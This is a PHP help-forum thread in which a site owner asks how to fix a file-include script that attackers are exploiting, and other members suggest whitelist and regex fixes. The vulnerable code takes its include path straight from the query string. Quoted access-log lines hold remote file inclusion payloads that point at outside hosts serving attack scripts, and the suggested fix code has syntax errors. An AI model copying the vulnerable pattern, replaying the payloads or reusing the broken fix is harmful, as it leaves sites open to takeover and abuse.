Jump to content

PHP Code security exploit (PHP injuction) How do I fix this?

drfate

By drfate
in PHP Coding Help

 Share

Recommended Posts

drfate Newbie

drfate

Posted
Posted

Hi Everyone,

 

I've got the following code in in a PHP which opens up a .HTM

 

<?php

if (isset($_GET["page"])){

$thepage = $_GET["page"];

$thetype = $_GET["type"];

include $thepage.'.'.$thetype;

}

?>

 

The problem is, this code is being exploited (see below for example).

 

Does anyone know how to stop this? :(

 

189.81.16.230 - - [12/Nov/2008:15:00:13 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"

74.6.22.180 - - [12/Nov/2008:16:09:09 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsanimatedadventuresewoks&type=htm HTTP/1.0" 200 3972 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

70.38.54.118 - - [12/Nov/2008:23:58:35 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsclonewars&type=htm/display.php?pg=http://masla.su/apache/idxx.txt?? HTTP/1.1" 200 15209 "-" "Mozilla/5.0"

70.38.54.118 - - [12/Nov/2008:23:58:35 -0500] "GET /dvdgeneraldisplay.php?page=dvd/display.php?pg=http://masla.su/apache/idxx.txt?? HTTP/1.1" 200 15266 "-" "Mozilla/5.0"

124.0.208.252 - - [13/Nov/2008:00:41:19 -0500] "GET /dvdgeneraldisplay.php?page=dvd/display.php?pg=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 15272 "-" "Mozilla/5.0"

124.0.208.252 - - [13/Nov/2008:00:41:19 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsclonewars&type=htm/display.php?pg=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 15104 "-" "Mozilla/5.0"

189.81.16.230 - - [13/Nov/2008:05:38:55 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"

189.81.16.230 - - [13/Nov/2008:06:14:07 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"

 

 

 

cheers,

Andrew

Link to comment
Share on other sites
KevinM1 Advanced Member

KevinM1

Posted
Posted

1. This has nothing to do with object oriented programming (OOP).

2. Code tags are your friends.

3. Your problem stems from not securing your incoming query strings.  At all.

 

A simple way to fix your problem is to create a whitelist of possible page values that actually represent the pages of your site, assuming your site is small (say fewer than 20 pages).  Then you can compare the incoming value with your list of legit pages.

 

$allowedPages = array("home", "news", "contact", "faqs"); //example values...replace with your actual page names
$page = strtolower($_GET['page']); //make sure the incoming value is all lowercase

if(!in_array($page, $allowedPages))
{
   echo "I don't think so....";
}
else
{
   include $page . '.' . $type;
}

Link to comment
Share on other sites
drfate Newbie

drfate

Posted
  • Author
Posted

1. This has nothing to do with object oriented programming (OOP).

2. Code tags are your friends.

3. Your problem stems from not securing your incoming query strings.  At all.

 

A simple way to fix your problem is to create a whitelist of possible page values that actually represent the pages of your site, assuming your site is small (say fewer than 20 pages).  Then you can compare the incoming value with your list of legit pages.

 

$allowedPages = array("home", "news", "contact", "faqs"); //example values...replace with your actual page names
$page = strtolower($_GET['page']); //make sure the incoming value is all lowercase

if(!in_array($page, $allowedPages))
{
   echo "I don't think so....";
}
else
{
   include $page . '.' . $type;
}

 

Hi Nightslyr, unfortuantely my site has quite few pages, any other ideas?

Link to comment
Share on other sites
corbin Regular Member

corbin

Posted
Posted

http://www.pacote270178.xpg.com.br/teste2.txt

 

 

lol.....  It looks like who ever exploited your site is using your server to mass email.  Depending on how many people he's spamming, you get get some fun messages soon ;p.

 

 

 

 

 

First off, don't let people pass in the extension.  There's no reason to.  I would use just PHP pages.

 

Second, restrict it some how.  A good way to do it if all of the files are in the same folder (and nothing unsafe is in said folder) is to do the following:

 

 

$page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default';
if(preg_match('^[a-zA-Z0-9_ -]+$', $page) && file_exists('some/folder/' . $page . '.php)) {
    require 'some/folder/' . $page . '.php';
}
else {
    echo "Page not found!";
}

Link to comment
Share on other sites
drfate Newbie

drfate

Posted
  • Author
Posted

http://www.pacote270178.xpg.com.br/teste2.txt

 

 

lol.....  It looks like who ever exploited your site is using your server to mass email.  Depending on how many people he's spamming, you get get some fun messages soon ;p.

 

First off, don't let people pass in the extension.  There's no reason to.  I would use just PHP pages.

 

Second, restrict it some how.  A good way to do it if all of the files are in the same folder (and nothing unsafe is in said folder) is to do the following:

 

 

$page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default';
if(preg_match('^[a-zA-Z0-9_ -]+$', $page) && file_exists('some/folder/' . $page . '.php)) {
    require 'some/folder/' . $page . '.php';
}
else {
    echo "Page not found!";
}

 

 

Hi Corbin,

 

thanks for your help.

 

Just a quick question, I have a .htaccess file which displays the following:

 

RewriteRule ^dvd(.*).html$ dvdgeneraldisplay.php?page=dvd/dvd$1&type=htm [L,NC]

 

and I put the following code in:

 

 

<?php

$page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default';

if(preg_match('^[a-zA-Z0-9_ -]+$', $page) && file_exists('dvd/' . $page . '.php)) {

    require 'dvd/' . $page . '.php;

}

else {

    echo "Page not found!";

}

?

 

Then I get the error: Parse error: syntax error, unexpected T_STRING in /home2/impulse/public_html/dvdgeneraldisplay.php on line 111

 

What am I missing?

 

 

Link to comment
Share on other sites
This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.